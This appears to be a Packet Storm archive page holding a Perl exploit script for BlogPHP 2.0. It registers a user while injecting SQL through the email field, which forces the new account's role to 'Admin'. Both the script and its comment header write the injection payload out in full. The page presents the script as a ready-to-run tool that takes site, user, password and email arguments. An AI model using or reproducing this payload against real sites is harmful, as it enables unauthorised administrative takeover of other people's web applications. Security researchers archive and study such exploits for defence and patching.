what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

blogphp-escalate.txt

blogphp-escalate.txt
Posted Jun 23, 2008
Authored by Cod3rZ | Site cod3rz.helloweb.eu

BlogPHP version 2.0 remote privilege escalation exploit.

tags | exploit, remote
SHA-256 | dee80b5af00a19d6a13dc6f01dbf1a8dbffb71caa9cef8cf57298230aca99c29
Download | Favorite | View

blogphp-escalate.txt

Change Mirror Download
#!/usr/bin/perl
# BlogPHP 2.0 Remote Privilege Escalation Exploit
# Author : Cod3rZ
# Site   : http://cod3rz.helloweb.eu
# Site   : http://devilsnight.altervista.org
# Cuz We Back Rude This Time
#
# Privilege Escalation
# Send a request to http://127.0.0.1/BlogPHPv2/index.php?act=register2 with:
# username=[yourusername]&password=[yourpass]&email=[yourmail]','Admin','','','','','','','','','','','','')/*
#
# There are other bugs, find them yourself
#
# Usage: perl bp.pl <site> <user> <pass> <mail>

system('cls');
#system('clear');

use LWP::UserAgent;
use HTTP::Request::Common;

$site = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
$mail = $ARGV[3];

 print " -------------------------------------------------\n";
 print " BlogPHP 2.0 Remote Privilege Escalation Exploit  \n";
 print " Powered by Cod3rZ                                \n";
 print " http://cod3rz.helloweb.eu                        \n";
 print " -------------------------------------------------\n";

sub usage {
  print " Usage: perl bp.pl <site> <user> <pass> <mail>    \n";
  print " -------------------------------------------------\n";
}
 if(!$mail) { &usage; }
 else {  
  if ($site !~ /http:\/\//) { $site = "http://".$site; }

  print " Site: $site                                      \n";
  print " User: $user                                      \n";
  print " Pass: $pass                                      \n";
  print " Mail: $mail                                      \n";
  print " -------------------------------------------------\n";
  print " Please Wait                                      \n";
  print " -------------------------------------------------\n";

  $ua = LWP::UserAgent->new;
   $lwp = $ua->request(POST $site.'index.php?act=register2', 
    [ username => $user, password => $pass, email    => $mail."','Admin','','','','','','','','','','','','')/*" ]);
  
  if($lwp->content =~ /Your now registered and logged in/) {
    print " Done. Now you're admin                           \n";
    print " -------------------------------------------------\n";
  }
  else {
    print " Failed.                                          \n";
    print " -------------------------------------------------\n";
  }

}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close